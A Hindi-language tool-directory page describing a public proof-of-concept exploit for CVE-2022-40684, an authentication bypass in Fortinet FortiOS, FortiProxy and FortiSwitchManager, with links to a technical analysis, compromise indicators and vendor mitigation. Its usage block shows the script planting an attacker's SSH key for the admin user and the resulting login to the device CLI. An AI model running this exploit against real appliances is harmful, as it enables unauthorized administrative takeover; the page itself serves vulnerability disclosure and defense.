Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-40684 — CVE-2022-40684 में Fortinet FortiOS, FortiProxy, और FortiSwitchManager में प्रमाणीकरण बायपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो निर्दिष्ट उपयोगकर्ताओं के लिए SSH कुंजी इंजेक्शन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/puckiestyle/cve-2022-40684
भेद्यता विश्लेषणशोषणवेब सुरक्षानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubpuckiestyle/cve-2022-40684

CVE-2022-40684

CVE-2022-40684 में Fortinet FortiOS, FortiProxy, और FortiSwitchManager में प्रमाणीकरण बायपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो निर्दिष्ट उपयोगकर्ताओं के लिए SSH कुंजी इंजेक्शन सक्षम करता है।

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-40684

Fortinet FortiOS, FortiProxy, और FortiSwitchManager उपकरणों को प्रभावित करने वाले CVE-2022-40684 के लिए POC।

तकनीकी विश्लेषण

भेद्यता का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

समझौता संकेतक

समझौता संकेतकों के लिए Fortinet लॉग का विश्लेषण करने और गहरे लॉग कैसे सक्षम करें, इसके लिए हमारे IOC ब्लॉग देखें: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

सारांश

यह POC निर्दिष्ट उपयोगकर्ता के लिए SSH कुंजी सेट करने के लिए प्रमाणीकरण बायपास भेद्यता का दुरुपयोग करता है।

उपयोग

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

शमन उपाय

नवीनतम संस्करण में अपडेट करें या Fortinet PSIRT के निर्देशों का पालन करके शमन करें

  • https://www.fortiguard.com/psirt/FG-IR-22-377

नवीनतम सुरक्षा अनुसंधान के लिए Horizon3.ai Attack Team को Twitter पर फॉलो करें:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

अस्वीकरण

यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए नहीं किया जाना चाहिए, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें